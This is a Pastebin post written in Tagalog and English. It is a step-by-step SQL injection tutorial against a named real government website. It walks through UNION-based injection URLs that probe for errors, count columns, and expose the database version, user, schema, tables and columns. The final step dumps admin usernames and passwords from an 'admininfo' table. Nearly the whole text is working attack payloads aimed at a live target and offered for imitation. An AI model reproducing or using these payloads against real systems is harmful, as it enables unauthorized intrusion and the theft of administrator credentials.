Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- target: http://www.tchjbh.gov.cn/news_display.php?id=148
- ito ang itchura niya.
- http://i247.photobucket.com/albums/gg151/titian_47/1_zps01dc4846.jpg
- need: FireFox Browser, hackbar add-onssa walang hackbar.. pwede ding sa chrome basta ung space ay papalitan nyo ng [ + ] or [ %20 ]example: http://www.tchjbh.gov.cn/news_display.php?id=148+union+select+1--
- 1.vulnerability checking=para macheck natin kung vulnerable ang website kelangan natin maglagay ng appostrophe ['] sa may hulian ng numero... [ news_display.php?id=148' ]may lalabas sa website na mysql error blablabla, meaning vulnerable sya para sa injection na gagawin natin!
- http://i247.photobucket.com/albums/gg151/titian_47/2_zpsa09eaf04.jpg?t=1403438834
- 2. column number checking=para macheck natin kung ilang column meron sa website, kelangn natin icheck isa isa hanggang makita natin ung errorang gagamitin natin ay [ ORDER BY #--)http://www.tchjbh.gov.cn/news_display.php?id=148 ORDER BY 1-- no errorhttp://www.tchjbh.gov.cn/news_display.php?id=148 ORDER BY 2-- no errorhttp://www.tchjbh.gov.cn/news_display.php?id=148 ORDER BY 3-- no error (short cut ko na ha!! kasi ang error ay nasa 22 pa!!)http://www.tchjbh.gov.cn/news_display.php?id=148 ORDER BY 22-- mysql error pag dating sa 22
- so nag error po xa sa order by 22-- meaning meron tayong 21 column.
- 3: paghanap ng vulnerable column=dahil 22 may nakita tayong error, meron tayong 21 numbers.. gento gagawin natin para macheck lagyan natin ng [ - ] news_display.php?id=-148 sa unahan ng number at [union sellect #--]http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--may makikita po kayong number
- 14 sa website, meaning yun po yung vulnerable number, nasa 14!!
- http://i247.photobucket.com/albums/gg151/titian_47/3_zpsb63fede3.jpg
- 4.sql version=sa number 14 palitan lang nating ng @@version para malaman natin ang verion ng sql parang
- gentohttp://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,@@version,15,16,17,18,19,20,21--may makikita po kayong [ 5.1.56-community ] yang po ang version ng sql.. version 5 sya. so para sa union base ang method na bagay dito. kasi pag version 4 blind method ang ginagamit
- http://i247.photobucket.com/albums/gg151/titian_47/4_zps7f8d2870.jpg
- 5.current user=palitan natin ng [user()] para malaman natin ang userhttp://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,user(),15,16,17,18,19,20,21--gento naman ang lalabas jan! tchjbh@127.0.0.1
- http://i247.photobucket.com/albums/gg151/titian_47/5_zpse6b83f3f.jpg
- 6: database namegento lang!! http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(schema_name),15,16,17,18,19,20,21 from information_schema.schemata--orhttp://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,concat(database()),15,16,17,18,19,20,21--gento makikita nyo [tchjbh] yan po yung database name
- http://i247.photobucket.com/albums/gg151/titian_47/6_zpsf8b95db4.jpg
- 7: paghanap ng table nameito na yung pinaka masayang part!! hahahagroup_concat(table_name)FROM information_schema.tables WHERE table_schema=database()--gento po http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(table_name),15,16,17,18,19,20,21 FROM information_schema.tables WHERE table_schema=database()--makikita natin ang list ng table name!! pero ang need lang natin ay ang [admininfo] ang kukunin natin!! minsan sa table may nakalagay na admin, users, members, etc..
- http://i247.photobucket.com/albums/gg151/titian_47/7_zpsae8042fe.jpg
- 8: paghahanap ng column namegroup_concat(column_name)FROM information_schema.columns WHERE table_schema=database()--http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(column_name),15,16,17,18,19,20,21 FROM information_schema.columns WHERE table_schema=database()--makikita po natin ung [ username at passwd ] sa column
- http://i247.photobucket.com/albums/gg151/titian_47/8_zpsddd3ce3b.jpg
- last part.
- 9. dumping admin and passwordkung mapapansin ninyo. kinuwa natin ng table name at column name. yung kinuwa natin na column at table ang gagamitin natin para d2.[0x3a] sa kasunod ng user name at passwdgroup_concat(username,0x3a,passwd,0x3a)from admininfo--http://www.tchjbh.gov.cn/news_display.php?id=-148+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(username,0x3a,passwd,0x3a),15,16,17,18,19,20,21+FROM+admininfo--
- http://i247.photobucket.com/albums/gg151/titian_47/9_zps78c6b2b2.jpg?t=1403440294
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement